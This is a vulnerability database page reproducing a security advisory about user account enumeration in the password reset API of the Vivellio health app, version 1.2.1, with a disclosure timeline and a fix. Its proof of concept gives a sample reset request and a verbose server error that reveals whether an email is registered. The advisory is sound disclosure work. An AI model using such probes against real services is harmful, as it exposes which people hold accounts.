Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Vivellio 1.2.1 User Account Enumeration

🗓️ 03 Feb 2022 00:00:00Reported by Karima Hebbal, trovent.ioType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 223 Views

Vivellio 1.2.1 User Account Enumeration in Password Rese

Code
`# Trovent Security Advisory 2108-01 #  
#####################################  
  
  
User account enumeration in password reset function  
###################################################  
  
  
Overview  
########  
  
Advisory ID: TRSA-2108-01  
Advisory version: 1.0  
Advisory status: Public  
Advisory URL: https://trovent.io/security-advisory-2108-01  
Affected product: Vivellio Android mobile application (com.netural.vivellio)  
Tested versions: Vivellio 1.2.1  
Vendor: blockhealth GmbH, https://www.vivellio.app  
Credits: Trovent Security GmbH, Karima Hebbal  
  
  
Detailed description  
####################  
  
The Vivellio mobile application is used to store health information.  
Trovent Security GmbH discovered a user account enumeration vulnerability in  
the password reset function of the Vivellio mobile application.  
The Vivellio server API allows checking if a user with a specific email address  
is registered or not.  
  
Severity: Medium  
CVSS Score: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)  
CWE ID: CWE-204  
CVE ID: N/A  
  
  
Proof of concept  
################  
  
Sample HTTP request sent with a non-registered email address:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
POST /user/reset-password HTTP/1.1  
Host: app-gate.vivellio.app  
Accept: application/json  
Content-Type: application/json; charset=UTF-8  
Content-Length: 28  
Accept-Encoding: gzip, deflate  
User-Agent: okhttp/3.14.1  
Connection: close  
  
  
{"email":"[email protected]"}  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
  
The server response to an invalid email address:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
HTTP/1.1 404   
  
Cache-Control: no-cache, no-store, max-age=0, must-revalidate  
Content-Type: application/json;charset=UTF-8  
Date: Mon, 30 Aug 2021 11:26:59 GMT  
Expires: 0  
Pragma: no-cache  
Server: openresty/1.15.8.1  
Vary: Accept-Encoding  
X-Content-Type-Options: nosniff  
X-Frame-Options: DENY  
X-XSS-Protection: 1; mode=block  
Content-Length: 1437  
Connection: Close  
  
  
{"cause":null,"stackTrace":[{"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"createPasswordResetProcess","fileName":"UserControllerImpl.java","lineNumber":539,"className":"ai.blockhealth.carify.user.controller.UserControllerImpl","nativeMethod":false},  
{"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"startPasswordReset","fileName":"UserControllerImpl.java","lineNumber":85,"className":"ai.blockhealth.carify.user.controller.UserControllerImpl","nativeMethod":false},  
{"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"startPasswordReset","fileName":"UserServiceImpl.java","lineNumber":52,"className":"ai.blockhealth.carify.user.service.UserServiceImpl","nativeMethod":false},  
{"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"startPasswordReset","fileName":"UserApi.java","lineNumber":61,"className":"ai.blockhealth.carify.user.UserApi","nativeMethod":false},  
{"classLoaderName":null,"moduleName":null,"moduleVersion":null,"methodName":"doFilterInternal","fileName":"VivellioRequestLogger.java","lineNumber":56,"className":"ai.blockhealth.carify.filter.VivellioRequestLogger","nativeMethod":false}],  
"message":"The email [email protected] could not be linked to an existing account.","suppressed":[],"localizedMessage":"The email [email protected] could not be linked to an existing account.","exceptionClass":"EmailNotFoundException"  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
  
Solution / Workaround  
#####################  
  
Ensure the application returns a consistent message for both existent and  
nonexistent accounts during the password reset process.  
  
Fixed in Vivellio server API, verified by Trovent.  
  
  
History  
#######  
  
2021-08-30: Vulnerability found & advisory created  
2021-09-24: Vendor contacted  
2021-09-27: Vendor replied  
2021-12-18: Vendor reported that the vulnerability is fixed  
2022-01-26: Trovent verified the fix of the vulnerability  
2022-02-03: Advisory published  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Feb 2022 00:00Current
0.1Low risk
Vulners AI Score0.1
vivellio mobile applicationtrovent security advisoryuser account enumeration
223